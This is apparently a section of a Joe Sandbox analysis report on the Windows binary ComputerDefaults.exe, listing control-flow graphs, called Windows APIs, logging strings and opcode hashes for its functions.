                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 8dbac9f2adf6e4ad10c19386a4b304e0167aadce468219441d3a3f125a4e9eab
                                                                    • Instruction ID: ecb739723f5f2503bd1150f40803bc97381cdbda9ae0d72c350880db10c96d6d
                                                                    • Opcode Fuzzy Hash: 8dbac9f2adf6e4ad10c19386a4b304e0167aadce468219441d3a3f125a4e9eab
                                                                    • Instruction Fuzzy Hash: 37B09220E29402C1D60DFB219C9106012A8AF5E790FD00430C00DC0120EE1C999A9700

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 280 7ff64d601e88-7ff64d601ebc 281 7ff64d601ec2-7ff64d601ec5 280->281 282 7ff64d6020cb-7ff64d6020f3 call 7ff64d60a080 280->282 281->282 284 7ff64d601ecb-7ff64d601ed9 281->284 286 7ff64d601efd-7ff64d601f08 284->286 287 7ff64d601edb-7ff64d601ee2 284->287 289 7ff64d601f34 286->289 290 7ff64d601f0a-7ff64d601f0d 286->290 287->286 288 7ff64d601ee4-7ff64d601ef7 287->288 288->282 288->286 293 7ff64d601f3b-7ff64d601f8e FormatMessageW 289->293 291 7ff64d601f0f-7ff64d601f12 290->291 292 7ff64d601f2b-7ff64d601f32 290->292 297 7ff64d601f14-7ff64d601f17 291->297 298 7ff64d601f22-7ff64d601f29 291->298 292->293 294 7ff64d601fb3-7ff64d601fbf call 7ff64d601dfc 293->294 295 7ff64d601f90-7ff64d601fb1 call 7ff64d601dfc 293->295 303 7ff64d601fc4-7ff64d601fd1 294->303 295->303 297->293 301 7ff64d601f19-7ff64d601f20 297->301 298->293 301->293 304 7ff64d601fd3-7ff64d601fe5 call 7ff64d601dfc 303->304 305 7ff64d601fe8-7ff64d602029 GetCurrentThreadId call 7ff64d601dfc 303->305 304->305 310 7ff64d60203b-7ff64d602054 call 7ff64d601dfc 305->310 311 7ff64d60202b-7ff64d60202f 305->311 315 7ff64d602068-7ff64d60206f 310->315 316 7ff64d602056-7ff64d602063 call 7ff64d601dfc 310->316 311->310 312 7ff64d602031-7ff64d602035 311->312 312->282 312->310 318 7ff64d602083-7ff64d602091 315->318 319 7ff64d602071-7ff64d60207e call 7ff64d601dfc 315->319 316->315 321 7ff64d602093-7ff64d6020a7 call 7ff64d601dfc 318->321 322 7ff64d6020a9-7ff64d6020af 318->322 319->318 321->282 324 7ff64d6020b1-7ff64d6020bd call 7ff64d601dfc 322->324 325 7ff64d6020bf-7ff64d6020c6 call 7ff64d601dfc 322->325 324->282 325->282
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentFormatMessageThread_vsnwprintf
                                                                    • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                    • API String ID: 223436642-3173542853
                                                                    • Opcode ID: ac4aa498168c14c4a18ee23e91b2cfe32a1cf6480e8bf109bc216f1e1dd02c9c
                                                                    • Instruction ID: 400567d0c7083b05462971ee1582b5e66ecee30c5b01eac00b164031ac8d86b3
                                                                    • Opcode Fuzzy Hash: ac4aa498168c14c4a18ee23e91b2cfe32a1cf6480e8bf109bc216f1e1dd02c9c
                                                                    • Instruction Fuzzy Hash: FA615821E1CA4681EA26FF55A4006B973E4FF4ABC8F448536DA4DC3798EF3CE544A700

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 394 7ff64d60927c-7ff64d6092a3 395 7ff64d6093e8-7ff64d6093ec 394->395 396 7ff64d6092a9-7ff64d6092b3 394->396 399 7ff64d6093ee-7ff64d60940c 395->399 397 7ff64d6092be-7ff64d6092c0 396->397 398 7ff64d6092b5-7ff64d6092bb 396->398 397->395 400 7ff64d6092c6-7ff64d6092e4 WaitForSingleObjectEx 397->400 398->397 402 7ff64d6092e6-7ff64d6092e8 400->402 403 7ff64d6092f5-7ff64d6092fa 400->403 404 7ff64d6092ea-7ff64d6092ef 402->404 405 7ff64d6092fe-7ff64d609305 402->405 403->405 406 7ff64d6092fc 403->406 404->403 407 7ff64d60940e-7ff64d60943c call 7ff64d602b4c 404->407 408 7ff64d6093d9-7ff64d6093dc 405->408 409 7ff64d60930b-7ff64d609317 call 7ff64d602c44 405->409 406->405 417 7ff64d60943e-7ff64d60945d GetLastError call 7ff64d6096c8 SetLastError 407->417 418 7ff64d609462-7ff64d60947e call 7ff64d607b2c 407->418 408->399 410 7ff64d6093de-7ff64d6093e6 call 7ff64d602c14 408->410 419 7ff64d609319-7ff64d609338 GetLastError call 7ff64d602c14 SetLastError 409->419 420 7ff64d60933d-7ff64d609347 409->420 410->399 417->418 430 7ff64d6094a0-7ff64d6094ac 418->430 431 7ff64d609480-7ff64d60949b GetProcessHeap HeapFree 418->431 419->420 423 7ff64d60938a-7ff64d60938d 420->423 427 7ff64d609349-7ff64d60934c 423->427 428 7ff64d60938f-7ff64d609396 423->428 432 7ff64d60937e-7ff64d609381 427->432 433 7ff64d609398 call 7ff64d602be4 428->433 434 7ff64d60939d-7ff64d6093a4 428->434 435 7ff64d6094ce-7ff64d6094d5 430->435 436 7ff64d6094ae-7ff64d6094c9 GetProcessHeap HeapFree 430->436 431->430 437 7ff64d60934e-7ff64d609379 call 7ff64d603314 GetProcessHeap HeapFree 432->437 438 7ff64d609383-7ff64d609386 432->438 433->434 440 7ff64d6093a6 call 7ff64d602be4 434->440 441 7ff64d6093ab-7ff64d6093b2 434->441 445 7ff64d6094d7 call 7ff64d607918 435->445 446 7ff64d6094dc-7ff64d6094e3 435->446 436->435 437->432 438->423 440->441 442 7ff64d6093b9-7ff64d6093d4 GetProcessHeap HeapFree 441->442 443 7ff64d6093b4 call 7ff64d602be4 441->443 442->408 443->442 445->446 451 7ff64d6094ea-7ff64d6094f1 446->451 452 7ff64d6094e5 call 7ff64d607918 446->452 454 7ff64d6094f8-7ff64d60950a 451->454 455 7ff64d6094f3 call 7ff64d6096c8 451->455 452->451 455->454
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$ErrorFreeLastProcess$ObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 1185803644-0
                                                                    • Opcode ID: d1782cae966a41b95b894cbbf2b07677d899974d78a83fd14f4012f504048030
                                                                    • Instruction ID: 2b2374757263ef9f62b20150d64dbd1cbb5404ddeb16615faee468f88a81081a
                                                                    • Opcode Fuzzy Hash: d1782cae966a41b95b894cbbf2b07677d899974d78a83fd14f4012f504048030
                                                                    • Instruction Fuzzy Hash: 69714021E0DA4286EA5AFF66A44027CA7A5FF4BBD0F088531DB4E87795EF3CE4419700

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$ErrorLast$FreeProcess$CriticalDeleteSectionThreadpoolTimer$CallbacksWait
                                                                    • String ID:
                                                                    • API String ID: 3162582620-0
                                                                    • Opcode ID: ef5825e706ec922aa58e0d60891aaba1bd8e1d2cb581e554127e4d3f83cbd235
                                                                    • Instruction ID: 805b1975a5a2940b5077664d3907cd007d263135a08f5621fc1b7d0eaca4a711
                                                                    • Opcode Fuzzy Hash: ef5825e706ec922aa58e0d60891aaba1bd8e1d2cb581e554127e4d3f83cbd235
                                                                    • Instruction Fuzzy Hash: CE413B21E19A4197FA4AFF61A1543BCAB61FF8BB80F488535CB0E87751EF38E4619700

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSingleWait
                                                                    • String ID: wil
                                                                    • API String ID: 24740636-1589926490
                                                                    • Opcode ID: 97405c57243110d0ce8fae4e2d32198e315ce6e961dad71eadac086dcb9616a3
                                                                    • Instruction ID: 638d73ed43158cc222f755b73251db3647c476be07316a6e9e0c7c6963761f36
                                                                    • Opcode Fuzzy Hash: 97405c57243110d0ce8fae4e2d32198e315ce6e961dad71eadac086dcb9616a3
                                                                    • Instruction Fuzzy Hash: 08412831E0C542C6F762FB25E40027E66A5EF8B7D1F60C131D91AC6A98EF3DE845A701

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateSemaphore
                                                                    • String ID: _p0$wil
                                                                    • API String ID: 4049970386-1814513734
                                                                    • Opcode ID: c4a6e541a755844c069233b1ce00aa8429c7afd8226d18b1f6e0449b961cbace
                                                                    • Instruction ID: 536f660306f957de52d4fa9f5871f0bba4942b79dbaa41ed0de86c5c5b08d759
                                                                    • Opcode Fuzzy Hash: c4a6e541a755844c069233b1ce00aa8429c7afd8226d18b1f6e0449b961cbace
                                                                    • Instruction Fuzzy Hash: BF514C22F1DB8286EB12FF11A4546BA66A4FF4EB80F444035DA4D87795EF3CD449D740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Processmemcpy_s$AllocFreememset
                                                                    • String ID:
                                                                    • API String ID: 3570669803-0
                                                                    • Opcode ID: fbd40f5542db093abe6d400c8e1c9455f57a8c9d4b08fd1c016092396fcb8199
                                                                    • Instruction ID: 628b8571ee0edcac8d7567fea12ca0b6a8d459a099a0b89f1ae8124ea1162bc5
                                                                    • Opcode Fuzzy Hash: fbd40f5542db093abe6d400c8e1c9455f57a8c9d4b08fd1c016092396fcb8199
                                                                    • Instruction Fuzzy Hash: 6981B172E0DB8686EE56FF59A60457877A5FB1BBD1F198031CA0D87650EF38E492D300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AddressFreeHandleModuleProcProcess
                                                                    • String ID: RtlNotifyFeatureUsage$ntdll.dll
                                                                    • API String ID: 3729415315-2443152447
                                                                    • Opcode ID: 7b47c4fe29fcc35ae8c828764c8aa711cd8b2d30fe3c94617e860d5f59792404
                                                                    • Instruction ID: 5301552eaf25b824eec64275d5666ce7fc6abebbbe9b0528a5f81b0e2d4913e5
                                                                    • Opcode Fuzzy Hash: 7b47c4fe29fcc35ae8c828764c8aa711cd8b2d30fe3c94617e860d5f59792404
                                                                    • Instruction Fuzzy Hash: 69416B61E1D65682FA62FB19A8507B967A0EF977C0F848035D90EC36A6FF6CE444E700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc$ErrorLast
                                                                    • String ID: RtlSubscribeWnfStateChangeNotification$ntdll.dll
                                                                    • API String ID: 798792539-2214456325
                                                                    • Opcode ID: a330eb9439d98cbbd78881b940575d8327b5e4ae3afed114a01c56a235b339b4
                                                                    • Instruction ID: 2dbee165cc70d089505696b295e76a69755e39b845933f0c7cb93a1df43ad795
                                                                    • Opcode Fuzzy Hash: a330eb9439d98cbbd78881b940575d8327b5e4ae3afed114a01c56a235b339b4
                                                                    • Instruction Fuzzy Hash: 6F311232E2DB4586EA06FB11E4543BA63A8FB4ABD5F548135DA4D86750EF3CE804D740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireAddressHandleModuleProcRelease
                                                                    • String ID: RtlRegisterFeatureConfigurationChangeNotification$ntdll.dll
                                                                    • API String ID: 303310891-4023217342
                                                                    • Opcode ID: 84eaec416acf5db6fc9ab1c3ce1db6eceb1a0ef37bfe11e5fbbf424d7a353cc2
                                                                    • Instruction ID: 49005c083629825a55cd17fa2b52a29504dbfe18815f4e3c1409074bdd619873
                                                                    • Opcode Fuzzy Hash: 84eaec416acf5db6fc9ab1c3ce1db6eceb1a0ef37bfe11e5fbbf424d7a353cc2
                                                                    • Instruction Fuzzy Hash: 29310E21E0DB4682EA12FB56E8403BA67A4FB4ABC4F448431DE0D97765EF3CE545A340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorExclusiveLastLockThreadpoolTimer$AcquireCreateRelease
                                                                    • String ID:
                                                                    • API String ID: 117860038-0
                                                                    • Opcode ID: 7dc8a3791edbc688516b700561ea2c7c1e18926fafb4f7284ce94402df5517e6
                                                                    • Instruction ID: 80cc91c780f8325adee44eeb44d42fd24bdf897f28a66ed223de3c695b22ba8b
                                                                    • Opcode Fuzzy Hash: 7dc8a3791edbc688516b700561ea2c7c1e18926fafb4f7284ce94402df5517e6
                                                                    • Instruction Fuzzy Hash: 68319062E1C78186EA62FB25A45017AABA0FF4ABD1F049631DE4F43B95EF3CE045D700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorExclusiveLastLockThreadpoolTimer$AcquireCreateRelease
                                                                    • String ID:
                                                                    • API String ID: 117860038-0
                                                                    • Opcode ID: d4b88c9f201889c86319832be63777c28b6597f3a3c29e0d6bbffc6b99a1bcbc
                                                                    • Instruction ID: 73054623a7395c96b289d51c8b8534718ebb06b2390d6b007dd8586512127bf6
                                                                    • Opcode Fuzzy Hash: d4b88c9f201889c86319832be63777c28b6597f3a3c29e0d6bbffc6b99a1bcbc
                                                                    • Instruction Fuzzy Hash: 8C316F26E0CB919AEB12FB25A400279ABA0FB4ABD0F088531DE5D83B55EF7CD6559700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Lock$AcquireCriticalExclusiveReleaseSectionShared$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3221859647-0
                                                                    • Opcode ID: d3b939d6e05227b6ac8fc11ca1f440130c9d99415d0bc0854e7d3f706b0acb8b
                                                                    • Instruction ID: 9e6429352a887f194e24d6014e68a713cf0d6ea42febe883d12edf183a329b54
                                                                    • Opcode Fuzzy Hash: d3b939d6e05227b6ac8fc11ca1f440130c9d99415d0bc0854e7d3f706b0acb8b
                                                                    • Instruction Fuzzy Hash: 7D317C26E0CA9187EA12FF56A50017DAB61FB8AFD0F499130DE4E57B14EF3CE0459700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFreememcpy_s
                                                                    • String ID:
                                                                    • API String ID: 3519707287-0
                                                                    • Opcode ID: 33d7e8ad0a42fc6eae848dcb880d362cedac9263f122e391be41dec354d10a3b
                                                                    • Instruction ID: e0d95d3bed01eb055137087a55f45e5a384eb5aec71445bd12b79cb8bb20fa2e
                                                                    • Opcode Fuzzy Hash: 33d7e8ad0a42fc6eae848dcb880d362cedac9263f122e391be41dec354d10a3b
                                                                    • Instruction Fuzzy Hash: 3F313836E09B4186EB15EF16E400169BBA8FB4AFD4F148235CE5E47769EF38E446D340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$AddressAllocHandleModuleProcmemset
                                                                    • String ID:
                                                                    • API String ID: 2903015918-0
                                                                    • Opcode ID: 38cdad7a045a8026d3540da0daa3a515c7a4a2a86fa1e792c775652cfac7f3bb
                                                                    • Instruction ID: 195dc7547825e3da1ba406441eeea311bf5eb20f9edc36a8fd8ff40a4c9a8729
                                                                    • Opcode Fuzzy Hash: 38cdad7a045a8026d3540da0daa3a515c7a4a2a86fa1e792c775652cfac7f3bb
                                                                    • Instruction Fuzzy Hash: 78917D32F08A518AEB21EF66E4405BD7BB4FB5AB88B448535DE4E83755EF38E144D700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy_s$memcmp$memmove_s
                                                                    • String ID:
                                                                    • API String ID: 2013778500-0
                                                                    • Opcode ID: 4624a54b0363676680e25aa0e639095e79532e7c3ac860e8332d6f99b5af2003
                                                                    • Instruction ID: c180a18b40b53e684f65587af8fa7d3b164160b5e11c24d979567b0156e69695
                                                                    • Opcode Fuzzy Hash: 4624a54b0363676680e25aa0e639095e79532e7c3ac860e8332d6f99b5af2003
                                                                    • Instruction Fuzzy Hash: 9BC15D72F086918AEB21EFB590545FC27B2EB16BC8F504026DE4DA7B88EF38D546D344
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy_s$memcmp
                                                                    • String ID:
                                                                    • API String ID: 3506827942-0
                                                                    • Opcode ID: 4d491ddf2f419a65441c4a8f41896011face0b7d5856050ed287e4ac95eda598
                                                                    • Instruction ID: 4ec1114e60ebaaddac43831cdf9ed4cc694021926095cf36020fe9051eaea2f1
                                                                    • Opcode Fuzzy Hash: 4d491ddf2f419a65441c4a8f41896011face0b7d5856050ed287e4ac95eda598
                                                                    • Instruction Fuzzy Hash: 5F918D32E086928AEB11EF65D4085BD2776FB16BD8F604126DE4D97B85EF38D842E300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
